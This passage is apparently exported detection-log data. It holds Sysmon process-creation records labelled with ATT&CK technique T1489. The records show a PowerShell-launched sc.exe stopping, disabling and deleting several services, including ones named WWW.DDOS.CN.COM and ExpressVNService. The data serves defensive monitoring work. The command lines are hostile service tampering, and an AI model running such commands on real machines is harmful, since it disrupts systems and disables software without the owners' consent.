C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:02.719"",""processGuid"":""{df9fc3d3-b37a-5ecf-0000-0010843f1e00}"",""processId"":""6308"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop clr_optimization"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:30.984",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:02.660 +ProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010e53c1e00} +ProcessId: 7752 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop aspnet_staters 
+CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop aspnet_staters",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:02.667308300Z"",""eventRecordID"":""2435"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:02.660\r\nProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010e53c1e00}\r\nProcessId: 7752\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop aspnet_staters\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:02.660"",""processGuid"":""{df9fc3d3-b37a-5ecf-0000-0010e53c1e00}"",""processId"":""7752"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop aspnet_staters"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:30.942",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:02.644 +ProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010173c1e00} +ProcessId: 6724 +Image: C:\Windows\System32\sc.exe +FileVersion: 
10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config aspnet_staters Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config aspnet_staters Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:02.647160200Z"",""eventRecordID"":""2434"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:02.644\r\nProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010173c1e00}\r\nProcessId: 6724\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config aspnet_staters Start= 
Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:02.644"",""processGuid"":""{df9fc3d3-b37a-5ecf-0000-0010173c1e00}"",""processId"":""6724"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config aspnet_staters Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 
14:18:30.886",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:02.609 +ProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010863a1e00} +ProcessId: 3384 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHelpSvcs +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHelpSvcs",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:02.612612500Z"",""eventRecordID"":""2432"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:02.609\r\nProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010863a1e00}\r\nProcessId: 3384\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration 
Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHelpSvcs\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:02.609"",""processGuid"":""{df9fc3d3-b37a-5ecf-0000-0010863a1e00}"",""processId"":""3384"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHelpSvcs"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:30.778",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:02.558 +ProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010d2371e00} +ProcessId: 5680 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WWW.DDOS.CN.COM +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 
WWW.DDOS.CN.COM",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:02.563459200Z"",""eventRecordID"":""2429"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:02.558\r\nProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010d2371e00}\r\nProcessId: 5680\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WWW.DDOS.CN.COM\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:02.558"",""processGuid"":""{df9fc3d3-b37a-5ecf-0000-0010d2371e00}"",""processId"":""5680"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WWW.DDOS.CN.COM"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:30.751",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:02.517 +ProcessGuid: {df9fc3d3-b37a-5ecf-0000-00101c361e00} +ProcessId: 3880 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete ExpressVNService +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete ExpressVNService",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:02.519851000Z"",""eventRecordID"":""2427"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:02.517\r\nProcessGuid: {df9fc3d3-b37a-5ecf-0000-00101c361e00}\r\nProcessId: 3880\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete ExpressVNService\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:02.517"",""processGuid"":""{df9fc3d3-b37a-5ecf-0000-00101c361e00}"",""processId"":""3880"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete ExpressVNService"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:30.728",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:02.504 +ProcessGuid: {df9fc3d3-b37a-5ecf-0000-001046351e00} +ProcessId: 7228 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ExpressVNService +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop ExpressVNService",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:02.506709100Z"",""eventRecordID"":""2426"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:02.504\r\nProcessGuid: {df9fc3d3-b37a-5ecf-0000-001046351e00}\r\nProcessId: 7228\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop ExpressVNService\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:02.504"",""processGuid"":""{df9fc3d3-b37a-5ecf-0000-001046351e00}"",""processId"":""7228"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop ExpressVNService"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 